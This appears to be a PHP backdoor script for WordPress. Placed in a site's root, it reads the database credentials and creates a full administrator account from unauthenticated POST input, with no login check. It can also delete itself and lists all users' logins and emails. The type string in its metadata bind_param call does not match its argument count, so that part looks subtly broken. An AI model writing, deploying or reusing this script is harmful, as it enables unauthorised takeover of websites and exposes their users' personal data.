header("Content-Type: text/html;charset=utf-8");
ini_set('max_execution_time', '0');
error_reporting(E_ALL);
ini_set('display_errors', '1');

// WordPress 加载
require_once __DIR__ . '/wp-load.php';

// 数据库连接
$con = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
if (!$con) {
    die("数据库连接失败: " . mysqli_connect_error());
}
mysqli_set_charset($con, DB_CHARSET);

// 初始化变量
$notice = '';
$user_name = trim($_POST['user_name'] ?? '');
$pwd = trim($_POST['pwd'] ?? '');
$email = trim($_POST['email'] ?? '');
$action = $_POST['action'] ?? '';

// 删除文件操作
if ($action === 'del') {
    $file_path = __DIR__ . '/wp-add.php';
    if (file_exists($file_path)) {
        unlink($file_path);
        $notice = '文件已删除。';
    } else {
        $notice = '文件未找到，无法删除。';
    }
}

// 添加管理员用户
if ($user_name && $pwd && $email) {
    // 检查 wp_hash_password 函数是否存在
    if (!function_exists('wp_hash_password')) {
        function wp_hash_password($password)
        {
            global $wp_hasher;
            if (empty($wp_hasher)) {
                require_once ABSPATH . WPINC . '/class-phpass.php';
                $wp_hasher = new PasswordHash(8, true);
            }
            return $wp_hasher->HashPassword(trim($password));
        }
    }

    // 检查用户是否已存在
    $stmt = $con->prepare("SELECT ID FROM `{$table_prefix}users` WHERE user_login = ? OR user_email = ?");
    $stmt->bind_param('ss', $user_name, $email);
    $stmt->execute();
    $result = $stmt->get_result();
    $user_id = 0;

    if ($result->num_rows > 0) {
        $row = $result->fetch_assoc();
        $user_id = $row['ID'];
        $notice = '用户名或邮箱已存在。';
    } else {
        // 添加用户
        $hash = wp_hash_password($pwd);
        $stmt = $con->prepare("INSERT INTO `{$table_prefix}users` (user_login, user_pass, user_email, user_registered, user_status, display_name) VALUES (?, ?, ?, NOW(), 0, ?)");
        $stmt->bind_param('ssss', $user_name, $hash, $email, $user_name);
        $stmt->execute();
        $user_id = $stmt->insert_id;

        if ($user_id > 0) {
            // 添加用户元信息
            $capabilities = 'a:1:{s:13:"administrator";b:1;}';
            $stmt_meta = $con->prepare("INSERT INTO `{$table_prefix}usermeta` (user_id, meta_key, meta_value) VALUES 
                (?, 'nickname', ?), 
                (?, 'first_name', ''), 
                (?, 'last_name', ''), 
                (?, 'description', ''), 
                (?, 'rich_editing', 'true'), 
                (?, 'syntax_highlighting', 'true'), 
                (?, 'comment_shortcuts', 'false'), 
                (?, 'admin_color', 'fresh'), 
                (?, 'use_ssl', 0), 
                (?, 'show_admin_bar_front', 'true'), 
                (?, 'locale', ''), 
                (?, '{$table_prefix}capabilities', ?), 
                (?, '{$table_prefix}user_level', 10)");
            $stmt_meta->bind_param(
                'isiiiiiiiiiiissii',
                $user_id, $user_name,
                $user_id, $user_id, $user_id, $user_id, $user_id, $user_id, $user_id, $user_id, $user_id,
                $user_id, $user_id, $capabilities, $user_id
            );
            $stmt_meta->execute();

            if ($stmt_meta->affected_rows > 0) {
                $notice = '用户添加成功。';
            } else {
                $notice = '用户元数据添加失败。';
            }
        } else {
            $notice = '用户添加失败。';
        }
    }
}

// 获取用户列表
$sql = "SELECT ID, user_login, user_email, user_nicename, user_registered FROM `{$table_prefix}users`";
$result = mysqli_query($con, $sql);
$total = mysqli_num_rows($result);
$list = '';

if ($total > 0) {
    while ($row = mysqli_fetch_assoc($result)) {
        $list .= '<tr><td>' . htmlspecialchars($row['ID']) . '</td><td>' . htmlspecialchars($row['user_login']) . '</td><td>' . htmlspecialchars($row['user_email']) . '</td><td>' . htmlspecialchars($row['user_nicename']) . '</td><td>' . htmlspecialchars($row['user_registered']) . '</td></tr>';
    }
}

mysqli_close($con);
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <title>Add WordPress Admin</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body { background-color: #F2F2F2; }
        .notice { background-color: #FFFF00; color: #0074BF; padding: 10px; }
        .table { border-collapse: collapse; width: 90%; margin: 30px auto; }
        .table td, .table th { border: 1px solid #ddd; padding: 8px; }
        .table tr:nth-child(odd) { background-color: #f9f9f9; }
    </style>
</head>
<body>
    <div class="notice"><?php echo $notice; ?></div>
    <table class="table">
        <thead>
            <tr>
                <th>ID</th>
                <th>用户名</th>
                <th>邮箱</th>
                <th>昵称</th>
                <th>注册时间</th>
            </tr>
        </thead>
        <tbody>
            <?php echo $list; ?>
        </tbody>
    </table>
</body>
</html>
